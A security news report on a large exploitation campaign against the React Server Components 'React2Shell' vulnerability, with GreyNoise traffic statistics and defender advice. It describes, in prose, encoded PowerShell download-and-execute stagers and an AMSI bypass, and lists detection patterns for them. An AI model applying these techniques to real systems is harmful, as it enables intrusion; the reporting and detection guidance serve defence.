The React Server Components (RSC) “Flight” protocol remote code execution vulnerability, tracked as CVE-2025-55182 and publicly referred to as “React2Shell,” has become the target of a massive exploitation campaign that shows no signs of slowing.
Since the vulnerability’s initial disclosure, threat intelligence firm GreyNoise has recorded over 8.1 million attack sessions, with daily attack volumes stabilizing between 300,000 and 400,000 after peaking above 430,000 in late December 2025.
The sheer scale of this campaign underscores the critical nature of the vulnerability, which affects React, Next.js, and numerous downstream frameworks reliant on the RSC Flight protocol.
The affected technology sits directly in front of application logic that often runs with production-level permissions, making it a high-value target for threat actors across the ecosystem.
The exploitation infrastructure underpinning this campaign spans 8,163 unique source IP addresses distributed across 1,071 autonomous system numbers (ASNs) in 101 countries.
This geographic and network diversity reflects broad adoption of the exploit across numerous threat actor groups, from opportunistic automated botnets to more sophisticated threat operations.
Amazon Web Services dominates the source network distribution, accounting for over one-third of all observed exploitation traffic.
The top 15 ASNs collectively comprise roughly 60 percent of source IPs, indicating that cloud infrastructure providers remain the preferred platform for orchestrating large-scale attack campaigns.
Diverse Payload Tactics
The campaign has generated over 70,000 unique payloads to date, reflecting continuous experimentation and iteration by attackers.
Network fingerprint analysis reveals 700 distinct JA4H hashes (HTTP client fingerprints) and 340 unique JA4T hashes (TCP stack fingerprints), demonstrating the variety of tooling and automation frameworks being deployed against vulnerable endpoints.
Attack patterns reveal a multi-stage exploitation methodology. Initial proof-of-execution (PoE) commands use simple PowerShell arithmetic operations to validate command execution with minimal endpoint artifacts.
Following successful validation, attackers deploy encoded PowerShell stagers using the standard “-enc” obfuscation technique combined with “DownloadString” and immediate execution (IEX) primitives to retrieve second-stage payloads.
Stage-two payloads employ reflection-based anti-malware bypass techniques targeting Windows AMSI (Antimalware Scan Interface), reflecting commodity exploitation practices widely documented across modern attack toolchains.
Approximately 50 percent of observed exploitation IPs were first seen by GreyNoise after July 2025, indicating heavy reliance on newly provisioned infrastructure and rapid IP rotation tactics typical of VPS and proxy pool operations.
This pattern suggests opportunistic, largely automated exploitation rather than targeted intrusion activity at least in the initial waves.
Defensive Recommendations
Organizations must prioritize patching React and Next.js deployments immediately. Network defenders should deploy GreyNoise’s dynamic blocklists targeting the identified exploitation source infrastructure, as static IP-based blocking alone remains insufficient given the volume and breadth of attacker infrastructure.
The sustained attack volume, infrastructure diversity, and rapid IP churn indicate this campaign will persist as threat actors continue integrating React2Shell into commodity botnet exploitation kits.
Endpoint defenders should monitor for process creation events combining PowerShell execution with encoded command parameters, “DownloadString” functionality, or the specific AMSI bypass reflection patterns.
PowerShell script block logging (Windows Event ID 4104) should be configured to alert on suspicious combinations involving System.Management.Automation.AmsiUtils and reflection-based field modification.
Defenders who move quickly on patching and implement high-quality endpoint detection remain positioned to contain this threat during its opportunistic initial phase.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.